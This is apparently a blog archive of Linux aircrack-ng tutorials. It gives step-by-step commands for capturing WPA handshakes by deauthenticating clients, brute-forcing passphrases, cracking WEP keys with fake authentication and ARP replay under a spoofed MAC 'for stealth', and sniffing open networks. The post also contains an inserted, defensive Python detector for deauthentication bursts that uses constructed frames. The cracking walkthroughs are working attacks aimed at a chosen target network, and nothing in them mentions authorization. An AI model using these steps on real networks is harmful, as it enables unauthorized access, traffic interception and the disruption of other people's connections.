Category Archives: Wireless

Backport of Aircrack-ng for Debian Wheezy

I have created a backport of aircrack-ng based on the version in Jessie/Testing. This may be installed with the command:
dpkg -i aircrack-ng_1.1-6~bpo70+1_amd64.deb
(remove the package with: dpkg -r aircrack-ng)
download here

This package is now available in Debian wheezy-backports.

Back in March 2012 I built the latest svn version from source, available here.
I have included the necessary scripts and binary files in the ‘bin/’ directory. Copy these to somewhere like: /usr/local/sbin/

Brute Forcing WPA WiFi Encryption

WPA and WPA2 provide good WiFi security; their main weakness is a brute force (dictionary) attack against the passphrase. Here is how such a brute force attack may be carried out.
Using Debian Wheezy (testing) and an Intel Corporation Centrino Wireless-N 1000 card:

  1. Stop Network Manager: /etc/init.d/network-manager stop
  2. Enter monitor mode: airmon-ng start wlan0
  3. Find nearby networks: airodump-ng mon0
  4. Identify the target BSSID and Channel number (-c option below)
  5. Start packet capture and leave running: airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capturefile mon0
  6. Leave packet capture running until "WPA Handshake" is seen (displayed in the top-right of airodump-ng)
  7. Or attempt to force a WPA Handshake by deauthenticating a client station: aireplay-ng --deauth 1 -a 00:11:22:33:44:55 -c 55:55:55:55:55:55 --ignore-negative-one mon0 (where -c is the MAC address of one of the stations displayed in airodump-ng)
  8. Apply brute force: aircrack-ng -w password.lst capturefile.cap
  9. The password.lst is included in the 'test/' directory of the aircrack-ng source. Many others are available for download.
  10. Stop monitor mode: airmon-ng stop mon0
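The deauthentication step above is also the event a wireless IDS watches for on the defensive side. The following is an added example, not code from the original post or from the aircrack-ng project: it decodes raw 802.11 management frames, keeps a per-BSSID sliding window, and reports a burst of deauth/disassoc frames; every frame, timestamp and MAC address in it is constructed test data.

```python
import struct
from collections import deque, defaultdict

# IEEE 802.11 management (type 0) subtypes that tear down a client's session.
DISASSOC, DEAUTH = 10, 12
BROADCAST = "ff:ff:ff:ff:ff:ff"
_mac = lambda b: ":".join(f"{x:02x}" for x in b)
_raw = lambda m: bytes.fromhex(m.replace(":", ""))

def parse_mgmt_frame(frame):
    # Returns (subtype, dst, src, bssid, reason) for deauth/disassoc, else None.
    if len(frame) < 26:
        return None
    ftype, subtype = (frame[0] >> 2) & 0x3, frame[0] >> 4   # frame-control byte 0
    if ftype != 0 or subtype not in (DISASSOC, DEAUTH):
        return None
    reason = struct.unpack_from("<H", frame, 24)[0]          # body follows 24-byte header
    return subtype, _mac(frame[4:10]), _mac(frame[10:16]), _mac(frame[16:22]), reason

def build_frame(subtype, dst, src, bssid, reason=7):
    # Constructed test frame: FC, duration, addr1..3, sequence control, reason code.
    return bytes([subtype << 4, 0, 0, 0]) + _raw(dst) + _raw(src) + _raw(bssid) \
        + b"\x00\x00" + struct.pack("<H", reason)

def sample_capture():
    # Constructed capture: a beacon (subtype 8), then six broadcast deauths in 3 s.
    ap = "00:11:22:33:44:55"   # constructed BSSID, matching the one used on this page
    frames = [(0.0, bytes([0x80, 0]) + bytes(30))]
    frames += [(1.0 + 0.5 * i, build_frame(DEAUTH, BROADCAST, ap, ap)) for i in range(6)]
    return frames

def detect_deauth_bursts(frames, window=10.0, threshold=5):
    # frames: iterable of (timestamp_s, raw_frame). One alert per BSSID that
    # sees >= threshold deauth/disassoc frames within `window` seconds.
    recent, alerted, alerts = defaultdict(deque), set(), []
    for ts, raw in frames:
        parsed = parse_mgmt_frame(raw)
        if parsed is None:
            continue
        subtype, dst, src, bssid, reason = parsed
        q = recent[bssid]
        q.append(ts)
        while ts - q[0] > window:                # drop timestamps outside the window
            q.popleft()
        if len(q) >= threshold and bssid not in alerted:
            alerted.add(bssid)
            alerts.append({"bssid": bssid, "count": len(q), "at": ts,
                           "broadcast": dst == BROADCAST, "reason": reason})
    return alerts
```

A real deployment would feed frames from a monitor-mode capture; a broadcast destination with many frames in a short window is the pattern that a legitimate roaming event does not produce.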

Breaking WEP Encryption

Using Debian Wheezy (testing) with an Intel Corporation Centrino Wireless-N 1000 card:

    1. Stop network manager: /etc/init.d/network-manager stop
    2. Enter monitor mode: airmon-ng start wlan0
    3. Find nearby networks: airodump-ng mon0
    4. Identify the target BSSID, SSID and Channel number (-c option below)
    5. Start packet capture and leave running: airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capturefile mon0
    6. Run the following two commands at the same time in separate windows (-h changes our source address, to add some stealth)
      1. aireplay-ng --fakeauth 40 -a 00:11:22:33:44:55 -h 01:12:34:56:67:89 --ignore-negative-one mon0
      2. aireplay-ng --arpreplay -x 20 -b 00:11:22:33:44:55 -h 01:12:34:56:67:89 --ignore-negative-one -e SSID mon0
      3. When this sees an ARP packet, it will go like crazy injecting packets and you will see the "#Data" count rapidly increasing in the airodump-ng window
    7. After collecting 30,000 packets (you may leave airodump-ng running): aircrack-ng -1 capturefile.cap
    8. The WEP key should then be displayed in the terminal window.
    9. The collected packet trace may be decrypted with: airdecap-ng -w $wep_key_hex capturefile.cap
    10. Exit monitor mode: airmon-ng stop mon0

Open Wireless Network Packet Sniffing

This is easier and more effective than packet sniffing on a wired network:

  1. Stop Network Manager: /etc/init.d/network-manager stop
  2. Set your WiFi card into monitoring mode: airmon-ng start wlan0
  3. See what’s around: airodump-ng mon0
  4. Select a target network, and note the BSSID value and channel (used as '-c' option below)
  5. Collect the packet trace: airodump-ng -c 6 --bssid 00:12:34:56:78:90 -w output-file mon0
  6. Examine packet trace: wireshark output-file.cap

(run on Debian Wheezy [testing] using Intel Corporation Centrino Wireless-N 1000)

WiFi Card – Packet Injection in Linux

A very simple way to test if your WiFi card supports injection:

Stop Network Manager: /etc/init.d/network-manager stop
Put the card in monitor mode: airmon-ng start wlan0
Test using: aireplay-ng -9 mon0

With luck, the following output is displayed:
Trying broadcast probe requests…
Injection is working!

I am using Debian Wheezy (testing) with WiFi card:
Network controller: Intel Corporation Centrino Wireless-N 1000